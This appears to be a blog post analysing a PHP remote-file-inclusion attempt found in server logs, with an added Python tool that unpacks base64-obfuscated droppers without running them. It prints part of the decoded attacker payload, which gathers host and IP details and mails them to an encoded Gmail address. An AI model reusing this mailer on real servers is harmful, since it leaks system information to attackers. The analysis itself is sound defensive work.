Foreword – Note that none of our servers are vulnerable to remote file inclusion (RFI) attacks.

For the most part, the exploit attempts I covered in yesterday's post are common-or-garden PHP vulnerability scans.
Some of them are more interesting, though mostly because the payload is obfuscated (base64-encoded) rather than for anything else.

If I take an example from our log files:

Fetching the included file returns a base64-encoded string that the script passes to eval().
It's fairly easy to see what that string decodes to, merely by changing the eval to an echo:

```php
<?php
// Edited slightly for width; the original concatenation continues past this point
$lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXb".

// To stop execution and merely see the script contents, echo the decoded string instead of passing it to eval()
echo (base64_decode($lmge));
```

Echoing it returns the following (the excerpt refers to variables such as $creator that are set earlier in the decoded script):


```php
// Attacker's decoded payload, reproduced as found: it collects host details and mails them out
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."";
mail( $creator, $subj, $msg, $from);
```

So in this case the payload is a mailer: it sends the attacker our php_uname() output, the requesting IP and its reverse DNS name, the HTTP_HOST it ran under, the URL that worked for the exploit ($base) and which bypass was used ($bypasser), plus a few other PHP details.

If we decode the address the mail goes to (the $creator value is itself a base64 string), we can see it's a Gmail account:

```php
<?php
echo base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");   // returns the recipient address the script mails to
```
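The swap-eval-for-echo trick above still runs whatever else the dropper contains, and the recipient is hidden one base64 layer deeper. As an added example (not code from the original post), here is a small static unpacker in Python that peels eval(base64_decode(...)) layers without executing anything, then pulls out the mail() recipient and the data-gathering calls. The sample payload, the variable names and the attacker@example.com address are all constructed for the demonstration; the only thing taken from the post is the shape of the payload (concatenated string pieces, a nested base64 recipient).

```python
"""Static unpacker for eval(base64_decode(...)) PHP droppers (added example)."""
import base64
import binascii
import re

# Constructed sample, NOT the payload from the post's logs. The inner script
# hides its recipient in a second base64 blob, as the real one did.
_RECIPIENT_BLOB = base64.b64encode(b'attacker@example.com').decode()
_INNER = (
    '$creator=base64_decode("' + _RECIPIENT_BLOB + '");\n'
    '$name = php_uname(); $ip = getenv("REMOTE_ADDR");\n'
    '$msg = "uname: $name IP: $ip";\n'
    'mail($creator, $_SERVER["HTTP_HOST"], $msg);\n'
)
_BLOB = base64.b64encode(_INNER.encode()).decode()
# Outer layer splits the blob across concatenated "..." pieces, like the post's $lmge.
SAMPLE = (
    '<?php\n$lmge = "' + _BLOB[:40] + '".\n"' + _BLOB[40:] + '";\n'
    'eval(base64_decode($lmge));\n?>'
)

_STRING_ASSIGN = re.compile(r'\$(\w+)\s*=\s*((?:"[^"]*"\s*\.?\s*)+);')
_EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*(?:"(?P<lit>[^"]*)"|\$(?P<var>\w+))\s*\)\s*\)')
_B64_CALL = re.compile(r'base64_decode\s*\(\s*"(?P<lit>[A-Za-z0-9+/=]+)"\s*\)')
_MAIL = re.compile(r'\bmail\s*\(\s*(?:"(?P<lit>[^"]*)"|\$(?P<var>\w+))')
# Calls that gather the details such mailers exfiltrate.
_COLLECTORS = ('php_uname', 'getenv', 'gethostbyaddr', '$_SERVER', 'phpinfo')


def string_vars(code):
    """Map $var -> value for assignments built only from concatenated "..." literals."""
    out = {}
    for name, rhs in _STRING_ASSIGN.findall(code):
        out[name] = ''.join(re.findall(r'"([^"]*)"', rhs))
    return out


def b64_text(blob):
    """Decode a base64 blob to text; None if it is not valid base64."""
    try:
        raw = base64.b64decode(re.sub(r'\s+', '', blob), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode('utf-8', 'replace')


def unpack(code, max_depth=10):
    """Return [outer, layer1, ...], one entry per eval(base64_decode()) layer peeled."""
    layers = [code]
    for _ in range(max_depth):
        m = _EVAL_B64.search(layers[-1])
        if not m:
            break
        if m.group('lit') is not None:
            blob = m.group('lit')
        else:  # eval(base64_decode($var)): resolve $var from its string assignment
            blob = string_vars(layers[-1]).get(m.group('var'))
        decoded = b64_text(blob) if blob else None
        if decoded is None:
            break
        layers.append(decoded)
    return layers


def mail_recipient(code):
    """Recipient of the first mail() call, resolving $var = "..." or base64_decode("...")."""
    m = _MAIL.search(code)
    if not m:
        return None
    if m.group('lit') is not None:
        return m.group('lit')
    var = re.escape(m.group('var'))
    enc = re.search(r'\$' + var + r'\s*=\s*base64_decode\s*\(\s*"([A-Za-z0-9+/=]+)"', code)
    if enc:
        return b64_text(enc.group(1))
    return string_vars(code).get(m.group('var'))


def collectors(code):
    """Data-gathering calls present in the script, i.e. what would be exfiltrated."""
    return [c for c in _COLLECTORS if c in code]


def analyse(code):
    """Unpack all layers and summarise the innermost script's indicators."""
    layers = unpack(code)
    final = layers[-1]
    return {
        'layers': len(layers) - 1,
        'recipient': mail_recipient(final),
        'collectors': collectors(final),
        'decoded_literals': [b64_text(b) for b in _B64_CALL.findall(final)],
    }


if __name__ == '__main__':
    for key, value in analyse(SAMPLE).items():
        print(f'{key}: {value}')
```

Because nothing is ever passed to eval, this is safe to run over a captured payload directly; the recursion stops at the first layer that is not a plain base64 string, which is also the point at which you would want to look at the script by hand.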

Google has been notified about that account.
All in all, slightly more interesting than the usual!